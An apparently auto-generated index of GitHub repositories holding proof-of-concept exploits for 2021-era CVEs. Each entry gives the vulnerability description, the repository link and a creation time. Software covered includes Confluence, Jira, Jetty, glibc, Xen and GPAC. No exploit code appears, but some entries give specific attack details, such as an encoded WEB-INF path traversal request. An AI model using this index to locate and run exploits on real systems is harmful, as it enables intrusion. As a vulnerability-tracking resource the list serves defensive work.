**This nuclei template is to verify the vulnerability without executing any commands to the target machine** : [BeRserKerSec/CVE-2021-26084-Nuclei-template](https://github.com/BeRserKerSec/CVE-2021-26084-Nuclei-template) create time: 2021-09-02T11:47:10Z

**readme** : [mooneee/cve-2021-6901](https://github.com/mooneee/cve-2021-6901) create time: 2021-09-02T10:33:35Z

**no description** : [DCKento/CVE-2021-40375](https://github.com/DCKento/CVE-2021-40375) create time: 2021-08-31T11:13:14Z

**XSS** : [DCKento/CVE-2021-40374](https://github.com/DCKento/CVE-2021-40374) create time: 2021-08-31T11:12:49Z

**PoC for exploiting CVE-2019-17571 : Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.** : [AlAIAL90/CVE-2019-17571](https://github.com/AlAIAL90/CVE-2019-17571) create time: 2021-09-02T09:49:19Z

**PoC for exploiting CVE-2020-25649 : A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.** : [AlAIAL90/CVE-2020-25649](https://github.com/AlAIAL90/CVE-2020-25649) create time: 2021-09-02T09:49:15Z

**PoC for exploiting CVE-2021-38385 : Tor before 0.3.5.16, 0.4.5.10, and 0.4.6.7 mishandles the relationship between batch-signature verification and single-signature verification, leading to a remote assertion failure, aka TROVE-2021-007.** : [AlAIAL90/CVE-2021-38385](https://github.com/AlAIAL90/CVE-2021-38385) create time: 2021-09-02T09:49:42Z

**PoC for exploiting CVE-2021-39271 : OrbiTeam BSCW Classic before 7.4.3 allows authenticated remote code execution (RCE) during archive extraction via attacker-supplied Python code in the class attribute of a .bscw file. This is fixed in 5.0.12, 5.1.10, 5.2.4, 7.3.3, and 7.4.3.** : [AlAIAL90/CVE-2021-39271](https://github.com/AlAIAL90/CVE-2021-39271) create time: 2021-09-02T09:49:38Z

**PoC for exploiting CVE-2021-39117 : The AssociateFieldToScreens page in Atlassian Jira Server and Data Center before version 8.18.0 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability via the name of a custom field.** : [AlAIAL90/CVE-2021-39117](https://github.com/AlAIAL90/CVE-2021-39117) create time: 2021-09-02T09:49:34Z

**PoC for exploiting CVE-2021-39113 : Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to continue to view cached content even after losing permissions, via a Broken Access Control vulnerability in the allowlist feature. The affected versions are before version 8.13.9, and from version 8.14.0 before 8.18.0.** : [AlAIAL90/CVE-2021-39113](https://github.com/AlAIAL90/CVE-2021-39113) create time: 2021-09-02T09:49:30Z

**PoC for exploiting CVE-2021-39111 : The Editor plugin in Atlassian Jira Server and Data Center before version 8.5.18, from 8.6.0 before 8.13.10, and from version 8.14.0 before 8.18.2 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the handling of supplied content such as from a PDF when pasted into a field such as the description field.** : [AlAIAL90/CVE-2021-39111](https://github.com/AlAIAL90/CVE-2021-39111) create time: 2021-09-02T09:49:25Z

**PoC for exploiting CVE-2021-26084 : In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.** : [AlAIAL90/CVE-2021-26084](https://github.com/AlAIAL90/CVE-2021-26084) create time: 2021-09-02T09:49:21Z

**PoC for exploiting CVE-2021-31535 : LookupCol.c in X.Org X through X11R7.7 and libX11 before 1.7.1 might allow remote attackers to execute arbitrary code. The libX11 XLookupColor request (intended for server-side color lookup) contains a flaw allowing a client to send color-name requests with a name longer than the maximum size allowed by the protocol (and also longer than the maximum packet size for normal-sized packets). The user-controlled data exceeding the maximum size is then interpreted by the server as additional X protocol requests and executed, e.g., to disable X server authorization completely. For example, if the victim encounters malicious terminal control sequences for color codes, then the attacker may be able to take full control of the running graphical session.** : [AlAIAL90/CVE-2021-31535](https://github.com/AlAIAL90/CVE-2021-31535) create time: 2021-09-02T09:49:11Z

**PoC for exploiting CVE-2021-36159 : libfetch before 2021-07-26, as used in apk-tools, xbps, and other products, mishandles numeric strings for the FTP and HTTP protocols. The FTP passive mode implementation allows an out-of-bounds read because strtol is used to parse the relevant numbers into address bytes. It does not check if the line ends prematurely. If it does, the for-loop condition checks for the '\0' terminator one byte too late.** : [AlAIAL90/CVE-2021-36159](https://github.com/AlAIAL90/CVE-2021-36159) create time: 2021-09-02T09:49:06Z

**PoC for exploiting CVE-2021-22924 : libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse, if one of them matches the setup.Due to errors in the logic, the config matching function did not take 'issuercert' into account and it compared the involved paths *case insensitively*,which could lead to libcurl reusing wrong connections.File paths are, or can be, case sensitive on many systems but not all, and caneven vary depending on used file systems.The comparison also didn't include the 'issuer cert' which a transfer can setto qualify how to verify the server certificate.** : [AlAIAL90/CVE-2021-22924](https://github.com/AlAIAL90/CVE-2021-22924) create time: 2021-09-02T09:49:01Z

**PoC for exploiting CVE-2021-22926 : libcurl-using applications can ask for a specific client certificate to be used in a transfer. This is done with the `CURLOPT_SSLCERT` option (`--cert` with the command line tool).When libcurl is built to use the macOS native TLS library Secure Transport, an application can ask for the client certificate by name or with a file name - using the same option. If the name exists as a file, it will be used instead of by name.If the appliction runs with a current working directory that is writable by other users (like `/tmp`), a malicious user can create a file name with the same name as the app wants to use by name, and thereby trick the application to use the file based cert instead of the one referred to by name making libcurl send the wrong client certificate in the TLS connection handshake.** : [AlAIAL90/CVE-2021-22926](https://github.com/AlAIAL90/CVE-2021-22926) create time: 2021-09-02T09:48:58Z

**PoC for exploiting CVE-2021-22922 : When curl is instructed to download content using the metalink feature, thecontents is verified against a hash provided in the metalink XML file.The metalink XML file points out to the client how to get the same contentfrom a set of different URLs, potentially hosted by different servers and theclient can then download the file from one or several of them. In a serial orparallel manner.If one of the servers hosting the contents has been breached and the contentsof the specific file on that server is replaced with a modified payload, curlshould detect this when the hash of the file mismatches after a completeddownload. It should remove the contents and instead try getting the contentsfrom another URL. This is not done, and instead such a hash mismatch is onlymentioned in text and the potentially malicious content is kept in the file ondisk.** : [AlAIAL90/CVE-2021-22922](https://github.com/AlAIAL90/CVE-2021-22922) create time: 2021-09-02T09:48:54Z

**A basic PoC leak for CVE-2021-28663 (Internal of the Android kernel backdoor vulnerability)** : [lntrx/CVE-2021-28663](https://github.com/lntrx/CVE-2021-28663) create time: 2021-09-01T22:59:29Z

**ES File Explorer Open Port Vulnerability - CVE-2019-6447** : [fs0c131y/ESFileExplorerOpenPortVuln](https://github.com/fs0c131y/ESFileExplorerOpenPortVuln) create time: 2019-01-09T22:30:42Z

**This is exploit** : [maskerTUI/CVE-2021-26084](https://github.com/maskerTUI/CVE-2021-26084) create time: 2021-09-02T07:05:23Z

**CVE-2021-33909 Sequoia** : [ChrisTheCoolHut/CVE-2021-33909](https://github.com/ChrisTheCoolHut/CVE-2021-33909) create time: 2021-09-02T04:51:54Z

**Just run command without brain** : [smallpiggy/cve-2021-26084-confluence](https://github.com/smallpiggy/cve-2021-26084-confluence) create time: 2021-09-02T02:41:49Z

**Config files for my GitHub profile.** : [cveliz-2020074/cveliz-2020074](https://github.com/cveliz-2020074/cveliz-2020074) create time: 2021-09-02T01:05:34Z

**PoC for exploiting CVE-2020-18913 : EARCLINK ESPCMS-P8 was discovered to contain a SQL injection vulnerability in the espcms_web/Search.php component via the attr_array parameter. This vulnerability allows attackers to access sensitive database information.** : [AlAIAL90/CVE-2020-18913](https://github.com/AlAIAL90/CVE-2020-18913) create time: 2021-09-02T00:47:22Z

**PoC for exploiting CVE-2021-36934 : Windows Elevation of Privilege Vulnerability** : [AlAIAL90/CVE-2021-36934](https://github.com/AlAIAL90/CVE-2021-36934) create time: 2021-09-02T00:48:41Z

**PoC for exploiting CVE-2021-20815 : Cross-site scripting vulnerability in Edit Boilerplate screen of Movable Type (Movable Type 7 r.4903 and earlier (Movable Type 7 Series), Movable Type 6.8.0 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.4903 and earlier (Movable Type Advanced 7 Series), Movable Type Premium 1.44 and earlier, and Movable Type Premium Advanced 1.44 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.** : [AlAIAL90/CVE-2021-20815](https://github.com/AlAIAL90/CVE-2021-20815) create time: 2021-09-02T00:48:37Z

**PoC for exploiting CVE-2021-20814 : Cross-site scripting vulnerability in Setting screen of ContentType Information Widget Plugin of Movable Type (Movable Type 7 r.4903 and earlier (Movable Type 7 Series), Movable Type Advanced 7 r.4903 and earlier (Movable Type Advanced 7 Series), and Movable Type Premium 1.44 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.** : [AlAIAL90/CVE-2021-20814](https://github.com/AlAIAL90/CVE-2021-20814) create time: 2021-09-02T00:48:33Z

**PoC for exploiting CVE-2021-23434 : This affects the package object-path before 0.11.6. A type confusion vulnerability can lead to a bypass of CVE-2020-15256 when the path components used in the path parameter are arrays. In particular, the condition currentPath === '__proto__' returns false if currentPath is ['__proto__']. This is because the === operator returns always false when the type of the operands is different.** : [AlAIAL90/CVE-2021-23434](https://github.com/AlAIAL90/CVE-2021-23434) create time: 2021-09-02T00:48:29Z

**PoC for exploiting CVE-2021-20813 : Cross-site scripting vulnerability in Edit screen of Content Data of Movable Type (Movable Type 7 r.4903 and earlier (Movable Type 7 Series) and Movable Type Advanced 7 r.4903 and earlier (Movable Type Advanced 7 Series)) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.** : [AlAIAL90/CVE-2021-20813](https://github.com/AlAIAL90/CVE-2021-20813) create time: 2021-09-02T00:48:25Z

**PoC for exploiting CVE-2021-20812 : Cross-site scripting vulnerability in Setting screen of Server Sync of Movable Type (Movable Type Advanced 7 r.4903 and earlier (Movable Type Advanced 7 Series) and Movable Type Premium Advanced 1.44 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.** : [AlAIAL90/CVE-2021-20812](https://github.com/AlAIAL90/CVE-2021-20812) create time: 2021-09-02T00:48:21Z

**PoC for exploiting CVE-2021-28697 : grant table v2 status pages may remain accessible after de-allocation Guest get permitted access to certain Xen-owned pages of memory. The majority of such pages remain allocated / associated with a guest for its entire lifetime. Grant table v2 status pages, however, get de-allocated when a guest switched (back) from v2 to v1. The freeing of such pages requires that the hypervisor know where in the guest these pages were mapped. The hypervisor tracks only one use within guest space, but racing requests from the guest to insert mappings of these pages may result in any of them to become mapped in multiple locations. Upon switching back from v2 to v1, the guest would then retain access to a page that was freed and perhaps re-used for other purposes.** : [AlAIAL90/CVE-2021-28697](https://github.com/AlAIAL90/CVE-2021-28697) create time: 2021-09-02T00:48:17Z

**PoC for exploiting CVE-2021-20811 : Cross-site scripting vulnerability in List of Assets screen of Movable Type (Movable Type 7 r.4903 and earlier (Movable Type 7 Series), Movable Type 6.8.0 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.4903 and earlier (Movable Type Advanced 7 Series), Movable Type Premium 1.44 and earlier, and Movable Type Premium Advanced 1.44 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.** : [AlAIAL90/CVE-2021-20811](https://github.com/AlAIAL90/CVE-2021-20811) create time: 2021-09-02T00:48:14Z

**PoC for exploiting CVE-2021-20810 : Cross-site scripting vulnerability in Website Management screen of Movable Type (Movable Type 7 r.4903 and earlier (Movable Type 7 Series), Movable Type 6.8.0 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.4903 and earlier (Movable Type Advanced 7 Series), Movable Type Premium 1.44 and earlier, and Movable Type Premium Advanced 1.44 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.** : [AlAIAL90/CVE-2021-20810](https://github.com/AlAIAL90/CVE-2021-20810) create time: 2021-09-02T00:48:10Z

**PoC for exploiting CVE-2021-28696 : IOMMU page mapping issues on x86 T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Both AMD and Intel allow ACPI tables to specify regions of memory which should be left untranslated, which typically means these addresses should pass the translation phase unaltered. While these are typically device specific ACPI properties, they can also be specified to apply to a range of devices, or even all devices. On all systems with such regions Xen failed to prevent guests from undoing/replacing such mappings (CVE-2021-28694). On AMD systems, where a discontinuous range is specified by firmware, the supposedly-excluded middle range will also be identity-mapped (CVE-2021-28695). Further, on AMD systems, upon de-assigment of a physical device from a guest, the identity mappings would be left in place, allowing a guest continued access to ranges of memory which it shouldn't have access to anymore (CVE-2021-28696).** : [AlAIAL90/CVE-2021-28696](https://github.com/AlAIAL90/CVE-2021-28696) create time: 2021-09-02T00:48:06Z

**PoC for exploiting CVE-2021-28694 : IOMMU page mapping issues on x86 T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Both AMD and Intel allow ACPI tables to specify regions of memory which should be left untranslated, which typically means these addresses should pass the translation phase unaltered. While these are typically device specific ACPI properties, they can also be specified to apply to a range of devices, or even all devices. On all systems with such regions Xen failed to prevent guests from undoing/replacing such mappings (CVE-2021-28694). On AMD systems, where a discontinuous range is specified by firmware, the supposedly-excluded middle range will also be identity-mapped (CVE-2021-28695). Further, on AMD systems, upon de-assigment of a physical device from a guest, the identity mappings would be left in place, allowing a guest continued access to ranges of memory which it shouldn't have access to anymore (CVE-2021-28696).** : [AlAIAL90/CVE-2021-28694](https://github.com/AlAIAL90/CVE-2021-28694) create time: 2021-09-02T00:48:01Z

**PoC for exploiting CVE-2021-28164 : In Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224, the default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.** : [AlAIAL90/CVE-2021-28164](https://github.com/AlAIAL90/CVE-2021-28164) create time: 2021-09-02T00:47:57Z

**PoC for exploiting CVE-2021-34429 : For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.** : [AlAIAL90/CVE-2021-34429](https://github.com/AlAIAL90/CVE-2021-34429) create time: 2021-09-02T00:47:50Z

**PoC for exploiting CVE-2021-35940 : An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.** : [AlAIAL90/CVE-2021-35940](https://github.com/AlAIAL90/CVE-2021-35940) create time: 2021-09-02T00:47:46Z

**PoC for exploiting CVE-2021-28695 : IOMMU page mapping issues on x86 T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Both AMD and Intel allow ACPI tables to specify regions of memory which should be left untranslated, which typically means these addresses should pass the translation phase unaltered. While these are typically device specific ACPI properties, they can also be specified to apply to a range of devices, or even all devices. On all systems with such regions Xen failed to prevent guests from undoing/replacing such mappings (CVE-2021-28694). On AMD systems, where a discontinuous range is specified by firmware, the supposedly-excluded middle range will also be identity-mapped (CVE-2021-28695). Further, on AMD systems, upon de-assigment of a physical device from a guest, the identity mappings would be left in place, allowing a guest continued access to ranges of memory which it shouldn't have access to anymore (CVE-2021-28696).** : [AlAIAL90/CVE-2021-28695](https://github.com/AlAIAL90/CVE-2021-28695) create time: 2021-09-02T00:47:43Z

**PoC for exploiting CVE-2021-28698 : long running loops in grant table handling In order to properly monitor resource use, Xen maintains information on the grant mappings a domain may create to map grants offered by other domains. In the process of carrying out certain actions, Xen would iterate over all such entries, including ones which aren't in use anymore and some which may have been created but never used. If the number of entries for a given domain is large enough, this iterating of the entire table may tie up a CPU for too long, starving other domains or causing issues in the hypervisor itself. Note that a domain may map its own grants, i.e. there is no need for multiple domains to be involved here. A pair of "cooperating" guests may, however, cause the effects to be more severe.** : [AlAIAL90/CVE-2021-28698](https://github.com/AlAIAL90/CVE-2021-28698) create time: 2021-09-02T00:47:39Z

**PoC for exploiting CVE-2021-28699 : inadequate grant-v2 status frames array bounds check The v2 grant table interface separates grant attributes from grant status. That is, when operating in this mode, a guest has two tables. As a result, guests also need to be able to retrieve the addresses that the new status tracking table can be accessed through. For 32-bit guests on x86, translation of requests has to occur because the interface structure layouts commonly differ between 32- and 64-bit. The translation of the request to obtain the frame numbers of the grant status table involves translating the resulting array of frame numbers. Since the space used to carry out the translation is limited, the translation layer tells the core function the capacity of the array within translation space. Unfortunately the core function then only enforces array bounds to be below 8 times the specified value, and would write past the available space if enough frame numbers needed storing.** : [AlAIAL90/CVE-2021-28699](https://github.com/AlAIAL90/CVE-2021-28699) create time: 2021-09-02T00:47:35Z

**PoC for exploiting CVE-2021-37749 : MapService.svc in Hexagon GeoMedia WebMap 2020 before Update 2 (aka 16.6.2.66) allows blind SQL Injection via the Id (within sourceItems) parameter to the GetMap method.** : [AlAIAL90/CVE-2021-37749](https://github.com/AlAIAL90/CVE-2021-37749) create time: 2021-09-02T00:47:30Z

**PoC for exploiting CVE-2021-36359 : OrbiTeam BSCW Classic before 7.4.3 allows exportpdf authenticated remote code execution (RCE) via XML tag injection because reportlab\platypus\paraparser.py (reached via bscw.cgi op=_editfolder.EditFolder) calls eval on attacker-supplied Python code. This is fixed in 5.0.12, 5.1.10, 5.2.4, 7.3.3, and 7.4.3.** : [AlAIAL90/CVE-2021-36359](https://github.com/AlAIAL90/CVE-2021-36359) create time: 2021-09-02T00:47:26Z

**PoC for exploiting CVE-2021-20809 : Cross-site scripting vulnerability in Create screens of Entry, Page, and Content Type of Movable Type (Movable Type 7 r.4903 and earlier (Movable Type 7 Series), Movable Type 6.8.0 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.4903 and earlier (Movable Type Advanced 7 Series), Movable Type Premium 1.44 and earlier, and Movable Type Premium Advanced 1.44 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.** : [AlAIAL90/CVE-2021-20809](https://github.com/AlAIAL90/CVE-2021-20809) create time: 2021-09-02T00:47:18Z

**PoC for exploiting CVE-2021-20808 : Cross-site scripting vulnerability in Search screen of Movable Type (Movable Type 7 r.4903 and earlier (Movable Type 7 Series), Movable Type 6.8.0 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.4903 and earlier (Movable Type Advanced 7 Series), Movable Type Premium 1.44 and earlier, and Movable Type Premium Advanced 1.44 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.** : [AlAIAL90/CVE-2021-20808](https://github.com/AlAIAL90/CVE-2021-20808) create time: 2021-09-02T00:47:14Z

**PoC for exploiting CVE-2021-39138 : Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Developers can use the REST API to signup users and also allow users to login anonymously. Prior to version 4.5.1, when an anonymous user is first signed up using REST, the server creates session incorrectly. Particularly, the `authProvider` field in `_Session` class under `createdWith` shows the user logged in creating a password. If a developer later depends on the `createdWith` field to provide a different level of access between a password user and anonymous user, the server incorrectly classified the session type as being created with a `password`. The server does not currently use `createdWith` to make decisions about internal functions, so if a developer is not using `createdWith` directly, they are not affected. The vulnerability only affects users who depend on `createdWith` by using it directly. The issue is patched in Parse Server version 4.5.1. As a workaround, do not use the `createdWith` Session field to make decisions if one allows anonymous login.** : [AlAIAL90/CVE-2021-39138](https://github.com/AlAIAL90/CVE-2021-39138) create time: 2021-09-02T00:47:10Z

**PoC for exploiting CVE-2021-20793 : Untrusted search path vulnerability in the installer of Sony Audio USB Driver V1.10 and prior and the installer of HAP Music Transfer Ver.1.3.0 and prior allows an attacker to gain privileges and execute arbitrary code via a Trojan horse DLL in an unspecified directory.** : [AlAIAL90/CVE-2021-20793](https://github.com/AlAIAL90/CVE-2021-20793) create time: 2021-09-02T00:47:06Z

**PoC for exploiting CVE-2021-32778 : Envoy is an open source L7 proxy and communication bus designed for large modern service oriented architectures. In affected versions envoy’s procedure for resetting a HTTP/2 stream has O(N^2) complexity, leading to high CPU utilization when a large number of streams are reset. Deployments are susceptible to Denial of Service when Envoy is configured with high limit on H/2 concurrent streams. An attacker wishing to exploit this vulnerability would require a client opening and closing a large number of H/2 streams. Envoy versions 1.19.1, 1.18.4, 1.17.4, 1.16.5 contain fixes to reduce time complexity of resetting HTTP/2 streams. As a workaround users may limit the number of simultaneous HTTP/2 dreams for upstream and downstream peers to a low number, i.e. 100.** : [AlAIAL90/CVE-2021-32778](https://github.com/AlAIAL90/CVE-2021-32778) create time: 2021-09-02T00:47:01Z

**PoC for exploiting CVE-2021-40145 : ** DISPUTED ** gdImageGd2Ptr in gd_gd2.c in the GD Graphics Library (aka LibGD) through 2.3.2 has a double free. NOTE: the vendor's position is "The GD2 image format is a proprietary image format of libgd. It has to be regarded as being obsolete, and should only be used for development and testing purposes."** : [AlAIAL90/CVE-2021-40145](https://github.com/AlAIAL90/CVE-2021-40145) create time: 2021-09-02T00:46:57Z

**PoC for exploiting CVE-2021-32777 : Envoy is an open source L7 proxy and communication bus designed for large modern service oriented architectures. In affected versions when ext-authz extension is sending request headers to the external authorization service it must merge multiple value headers according to the HTTP spec. However, only the last header value is sent. This may allow specifically crafted requests to bypass authorization. Attackers may be able to escalate privileges when using ext-authz extension or back end service that uses multiple value headers for authorization. A specifically constructed request may be delivered by an untrusted downstream peer in the presence of ext-authz extension. Envoy versions 1.19.1, 1.18.4, 1.17.4, 1.16.5 contain fixes to the ext-authz extension to correctly merge multiple request header values, when sending request for authorization.** : [AlAIAL90/CVE-2021-32777](https://github.com/AlAIAL90/CVE-2021-32777) create time: 2021-09-02T00:46:54Z

**Draytek CVE-2020-8515 PoC** : [darrenmartyn/CVE-2020-8515](https://github.com/darrenmartyn/CVE-2020-8515) create time: 2021-09-01T22:47:54Z

**no description** : [fu2x2000/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit](https://github.com/fu2x2000/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit) create time: 2021-09-01T17:49:11Z

**PoC for exploiting CVE-2010-4756 : The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.** : [AlAIAL90/CVE-2010-4756](https://github.com/AlAIAL90/CVE-2010-4756) create time: 2021-09-01T16:45:48Z

**PoC for exploiting CVE-2013-1914 : Stack-based buffer overflow in the getaddrinfo function in sysdeps/posix/getaddrinfo.c in GNU C Library (aka glibc or libc6) 2.17 and earlier allows remote attackers to cause a denial of service (crash) via a (1) hostname or (2) IP address that triggers a large number of domain conversion results.** : [AlAIAL90/CVE-2013-1914](https://github.com/AlAIAL90/CVE-2013-1914) create time: 2021-09-01T16:45:26Z

**PoC for exploiting CVE-2013-7423 : The send_dg function in resolv/res_send.c in GNU C Library (aka glibc or libc6) before 2.20 does not properly reuse file descriptors, which allows remote attackers to send DNS queries to unintended locations via a large number of requests that trigger a call to the getaddrinfo function.** : [AlAIAL90/CVE-2013-7423](https://github.com/AlAIAL90/CVE-2013-7423) create time: 2021-09-01T16:45:14Z

**PoC for exploiting CVE-2015-0235 : Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST."** : [AlAIAL90/CVE-2015-0235](https://github.com/AlAIAL90/CVE-2015-0235) create time: 2021-09-01T16:45:30Z

**PoC for exploiting CVE-2015-7547 : Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc functions in the libresolv library in the GNU C Library (aka glibc or libc6) before 2.23 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted DNS response that triggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6 address family, related to performing "dual A/AAAA DNS queries" and the libnss_dns.so.2 NSS module.** : [AlAIAL90/CVE-2015-7547](https://github.com/AlAIAL90/CVE-2015-7547) create time: 2021-09-01T16:45:18Z

**PoC for exploiting CVE-2016-1234 : Stack-based buffer overflow in the glob implementation in GNU C Library (aka glibc) before 2.24, when GLOB_ALTDIRFUNC is used, allows context-dependent attackers to cause a denial of service (crash) via a long name.** : [AlAIAL90/CVE-2016-1234](https://github.com/AlAIAL90/CVE-2016-1234) create time: 2021-09-01T16:45:22Z

**PoC for exploiting CVE-2020-19822 : A remote code execution (RCE) vulnerability in template_user.php of ZZCMS version 2018 allows attackers to execute arbitrary PHP code via the "ml" and "title" parameters.** : [AlAIAL90/CVE-2020-19822](https://github.com/AlAIAL90/CVE-2020-19822) create time: 2021-09-01T16:45:37Z

**Reproduce CVE-2021-35042** : [mrlihd/CVE-2021-35042](https://github.com/mrlihd/CVE-2021-35042) create time: 2021-09-01T16:59:42Z

**PoC for exploiting CVE-2021-21853 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an integer overflow due to unchecked addition arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21853](https://github.com/AlAIAL90/CVE-2021-21853) create time: 2021-09-01T16:46:52Z

**PoC for exploiting CVE-2021-21847 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input in “stts” decoder can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21847](https://github.com/AlAIAL90/CVE-2021-21847) create time: 2021-09-01T16:46:48Z

**PoC for exploiting CVE-2021-21846 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input in “stsz” decoder can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21846](https://github.com/AlAIAL90/CVE-2021-21846) create time: 2021-09-01T16:46:45Z

**PoC for exploiting CVE-2021-21845 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input in “stsc” decoder can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21845](https://github.com/AlAIAL90/CVE-2021-21845) create time: 2021-09-01T16:46:41Z

**PoC for exploiting CVE-2021-21844 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input when encountering an atom using the “stco” FOURCC code, can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21844](https://github.com/AlAIAL90/CVE-2021-21844) create time: 2021-09-01T16:46:37Z

**PoC for exploiting CVE-2021-21843 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. After validating the number of ranges, at [41] the library will multiply the count by the size of the GF_SubsegmentRangeInfo structure. On a 32-bit platform, this multiplication can result in an integer overflow causing the space of the array being allocated to be less than expected. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21843](https://github.com/AlAIAL90/CVE-2021-21843) create time: 2021-09-01T16:46:35Z

**PoC for exploiting CVE-2021-21839 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21839](https://github.com/AlAIAL90/CVE-2021-21839) create time: 2021-09-01T16:46:31Z

**PoC for exploiting CVE-2021-21838 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21838](https://github.com/AlAIAL90/CVE-2021-21838) create time: 2021-09-01T16:46:27Z

**PoC for exploiting CVE-2021-21837 : Multiple exploitable integer overflow vulnerabilities exist within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21837](https://github.com/AlAIAL90/CVE-2021-21837) create time: 2021-09-01T16:46:24Z

